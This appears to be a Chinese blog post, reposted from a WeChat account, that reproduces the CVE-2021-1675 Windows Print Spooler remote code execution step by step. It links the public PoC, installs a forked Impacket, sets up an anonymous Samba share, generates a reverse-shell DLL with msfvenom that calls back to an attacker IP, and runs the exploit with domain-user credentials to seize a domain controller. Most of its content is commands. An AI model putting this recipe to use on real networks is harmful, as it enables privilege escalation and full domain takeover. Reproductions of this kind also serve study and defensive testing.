CVE-2021-1675 Windows Spooler Service RCE
一、漏洞Poc
https://github.com/cube0x0/CVE-2021-1675
二、环境配置
1、添加一个普通的域用户
漏洞的使用就是当你在渗透时拥有了一个普通的域成员,可以利用此漏洞去攻击域控,执行命令,直接拿下域控
这里涉及到符号转义问题,只做复现密码随便来一个Passw0rd
2、检查Spooler是否开启(默认开启)
这个肯定是默认开启的,不开启这个功能就无法实现打印
Spooler打印功能,会加载dll文件,通过进程树查看,可以看到是system权限,因为spoolsv.exe是x64的,所以生成的dll也得是x64
三、复现
1、在运行漏洞利用之前,需要安装作者的 Impacket 包
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
这里就不演示了,复制粘贴命令即可
2、开启匿名访问smb
2.1、修改/etc/samba/smb.conf
这里使用原作者的不行(反正我不行)......就用自己了
[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5
[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes
2.2、实际测试下
可以访问smb目录即可,这里的smb就是/tmp
2.3、可能存在的问题
2.3.1、如果报错error什么0x5的,就是无法匿名访问
2.3.2、如果在windows里操作,访问smb,提示什么权限这样那样的,那你就要注意路径的权限问题
3、MSF生成木马,CS也一样,开启监听
3.1、在tmp目录下生成.dll木马
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.128 lport=6666 -f dll -o reverse.dll
3.2、开启监听
4、利用Poc
4.1、看下帮助文档
python3 CVE-2021-1675.py -h
4.2、构造POC利用
python3 CVE-2021-1675.py 普通域用户:域用户密码@DC的IP地址 '开启的匿名访问'
python3 CVE-2021-1675.py oa:[email protected] '\10.10.10.128smbreverse.dll'
乱码可以使用下面命令解决
chcp 65001
原文始发于微信公众号(Nurburgring):CVE-2021-1675 Windows Spooler Service RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论